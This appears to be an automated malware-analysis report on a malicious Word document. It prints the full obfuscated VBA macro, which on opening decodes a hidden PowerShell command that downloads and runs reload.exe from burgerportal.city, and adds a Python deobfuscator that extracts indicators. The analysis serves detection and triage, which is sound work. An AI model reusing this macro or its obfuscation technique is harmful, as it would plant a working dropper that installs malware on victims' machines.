MALICIOUS
Risk Score: 150
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The critical heuristic OLE_VBA_SHELL together with the presence of VBA macros indicates malicious intent. Document_Open builds one long base64 string from short string literals and passes it to runm, which decodes it through an MSXML2.DOMDocument element with dataType bin.base64, turns the resulting bytes into a string with StrConv(..., 64) (vbUnicode), and hands it to Shell with window style 0 (vbHide). Decoded, the string is a PowerShell command (T1059.001) run with -WindowStyle Hidden: it downloads http://burgerportal.city/reload.exe with System.Net.WebClient, saves it as %TEMP%\<random number>.exe, and starts it with Start-Process. The document is therefore a downloader for a second-stage payload. Note that this URL exists only inside the base64 and so does not appear in the EMBEDDED_URL finding, which lists only XMP and schema namespace URIs from the document body; URL extraction alone would have missed the download source.
Heuristics (5)

- ClamAV: Doc.Trojan.Agent-6333895-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Agent-6333895-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell QRqx9, KMdylAK`
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Sub Document_Open()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2111 bytes | 957cb357cf7f1dd0be274bd3930c530acd62c4e3c9f32298fd15030c76fc3dcf |

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
fYM2F = "CArICdcJyArICRuYW1lICsgJy5leGUnO2ZvcmVhY2goJ"
teasSOom = "HVybCBpbiAkdXJscyl7dHJ5eyR3ZW"
Oc6Lx4HR = fYM2F & teasSOom
k3fngw = "JjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwuVG9TdHJpbmcoKSwgJHBhd"
enx2MdaU = "GgpO1N0YXJ0LVByb2Nlc3MgJHBhdGg7YnJlYWs7fWNhdGNoe3dyaXRlLWhvc3QgJF8"
etU8SAd1 = k3fngw & enx2MdaU
juALYN4j = "ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9t"
Lx15qY = "OyR1cmxzID0gJ"
GUR5FVYEv = juALYN4j & Lx15qY
gdhHBv = "uRX"
GixbU0j = "hjZXB0aW9uLk1lc3"
mC7Kv = "NhZ2U7f"
UaTnhjlM = "X0="
jRpFeXEd = gdhHBv & GixbU0j & mC7Kv & UaTnhjlM
ldYmQ = "cG93ZXJzaGVsb"
lT6OWJD = "CAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3"
owPoCf4h = "JpcHQuU2"
CcTsoP = "hlbGw7JHdlYmNsaWVudCA9IG5"
pT49SUgw = ldYmQ & lT6OWJD & owPoCf4h & CcTsoP
XAWskI = "2h"
at2Nh = "0dHA6Ly9idXJnZXJwb3J0YWwu"
EgdcR = "Y2l0eS9yZWxvYWQuZXhlJy5TcGxp"
OgLtez = "dCgnLCcpOyRuYW1lID0gJHJhbmRvbS5uZXh0KDEsIDY1NTM2KTskcGF0aCA9ICRlbnY6dGVtc"
HJxM3hB2 = XAWskI & at2Nh & EgdcR & OgLtez
vZBe0qfh = pT49SUgw & GUR5FVYEv & HJxM3hB2 & Oc6Lx4HR & etU8SAd1 & jRpFeXEd
Call runm(vZBe0qfh)
End Sub
Attribute VB_Name = "lARq3N"
Sub runm(GidTv)
IFwa60 = IZaP3Eh0(GidTv)
zIkLADKy. _
uKM2Nl6 IFwa60, 0
End Sub
Attribute VB_Name = "pEqp0"
Function IZaP3Eh0(n0cC5O4w) As String
Set pwEal3 = New MSXML2.DOMDocument
Set jGPKahw2o = pwEal3.createElement(sPuLO)
With jGPKahw2o
.dataType = "bin.base64"
.text = n0cC5O4w
IZaP3Eh0 = jGPKahw2o.nodeTypedValue
Y8xLT1U = -482 + 537
End With
Set jGPKahw2o = Nothing
Set pwEal3 = Nothing
End Function
Attribute VB_Name = "zIkLADKy"
Public Const sPuLO = "BASE64"
Public Sub uKM2Nl6(HC3MePac, KMdylAK)
Dim QRqx9 As String
QRqx9 = StrConv(HC3MePac, 64)
Shell QRqx9, KMdylAK
End Sub
```
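How the string-building stage unpacks, as an added example that is not part of the analyzer's output or of the sample: a Python script that does statically what the macro does at runtime. It resolves the string literals and `&` concatenations in Document_Open in source order, follows the variable handed to runm, base64-decodes it (what IZaP3Eh0 does through MSXML2.DOMDocument), and then pulls the download URL and the drop-path indicators out of the recovered PowerShell. The embedded DOCUMENT_OPEN text is the Document_Open procedure from macros.bas above; the function names resolve_strings, deobfuscate and extract_iocs are this example's own.

```python
import base64
import re

# Document_Open exactly as carved from the sample (macros.bas on this page).
# The other modules only decode and Shell() the result, so they are not needed.
DOCUMENT_OPEN = r'''
Sub Document_Open()
fYM2F = "CArICdcJyArICRuYW1lICsgJy5leGUnO2ZvcmVhY2goJ"
teasSOom = "HVybCBpbiAkdXJscyl7dHJ5eyR3ZW"
Oc6Lx4HR = fYM2F & teasSOom
k3fngw = "JjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwuVG9TdHJpbmcoKSwgJHBhd"
enx2MdaU = "GgpO1N0YXJ0LVByb2Nlc3MgJHBhdGg7YnJlYWs7fWNhdGNoe3dyaXRlLWhvc3QgJF8"
etU8SAd1 = k3fngw & enx2MdaU
juALYN4j = "ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9t"
Lx15qY = "OyR1cmxzID0gJ"
GUR5FVYEv = juALYN4j & Lx15qY
gdhHBv = "uRX"
GixbU0j = "hjZXB0aW9uLk1lc3"
mC7Kv = "NhZ2U7f"
UaTnhjlM = "X0="
jRpFeXEd = gdhHBv & GixbU0j & mC7Kv & UaTnhjlM
ldYmQ = "cG93ZXJzaGVsb"
lT6OWJD = "CAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3"
owPoCf4h = "JpcHQuU2"
CcTsoP = "hlbGw7JHdlYmNsaWVudCA9IG5"
pT49SUgw = ldYmQ & lT6OWJD & owPoCf4h & CcTsoP
XAWskI = "2h"
at2Nh = "0dHA6Ly9idXJnZXJwb3J0YWwu"
EgdcR = "Y2l0eS9yZWxvYWQuZXhlJy5TcGxp"
OgLtez = "dCgnLCcpOyRuYW1lID0gJHJhbmRvbS5uZXh0KDEsIDY1NTM2KTskcGF0aCA9ICRlbnY6dGVtc"
HJxM3hB2 = XAWskI & at2Nh & EgdcR & OgLtez
vZBe0qfh = pT49SUgw & GUR5FVYEv & HJxM3hB2 & Oc6Lx4HR & etU8SAd1 & jRpFeXEd
Call runm(vZBe0qfh)
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
LITERAL_RE = re.compile(r'^"([^"]*)"$')
CALL_RE = re.compile(r'^\s*Call\s+\w+\((\w+)\)', re.MULTILINE)
URL_RE = re.compile(r"https?://[^\s'\"]+")


def resolve_strings(vba):
    """Evaluate `x = "lit" & y & "lit"` statements in source order.

    Only pure string expressions (literals and already-known variables joined
    by &) are resolved; anything else (function calls, arithmetic) is skipped.
    Splitting on & is safe here because base64 never contains that character.
    """
    env = {}
    for line in vba.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        parts = []
        for operand in (p.strip() for p in rhs.split('&')):
            lit = LITERAL_RE.match(operand)
            if lit:
                parts.append(lit.group(1))
            elif operand in env:
                parts.append(env[operand])
            else:
                break            # not a resolvable string expression
        else:
            env[name] = ''.join(parts)
    return env


def deobfuscate(vba):
    """Return the command the macro hands to Shell() after base64 decoding."""
    env = resolve_strings(vba)
    m = CALL_RE.search(vba)
    if not m or m.group(1) not in env:
        raise ValueError('no Call <proc>(<resolved string var>) found')
    b64 = env[m.group(1)]
    raw = base64.b64decode(b64 + '=' * (-len(b64) % 4))   # tolerate missing padding
    # StrConv(bytes, vbUnicode) widens each ANSI byte to one character, so
    # latin-1 reproduces what the macro builds; the payload here is pure ASCII.
    return raw.decode('latin-1')


def extract_iocs(command):
    """Indicators a triage note needs from the decoded PowerShell."""
    return {
        'urls': URL_RE.findall(command),
        'hidden_window': '-WindowStyle Hidden' in command,
        'drops_to_temp': '$env:temp' in command,
        'executes_download': 'Start-Process' in command,
    }


if __name__ == '__main__':
    command = deobfuscate(DOCUMENT_OPEN)
    print(command)
    print(extract_iocs(command))
```

The script resolves the assignments in the order the macro executes them, so it works even though the fragments are declared out of order; the final `vZBe0qfh` line fixes the real concatenation order. The recovered command never appears as plain text anywhere in the document, which is why a URL-extraction heuristic alone lists only the XMP namespace URIs: the Shell-call heuristic, not the URL list, is the finding that matters here.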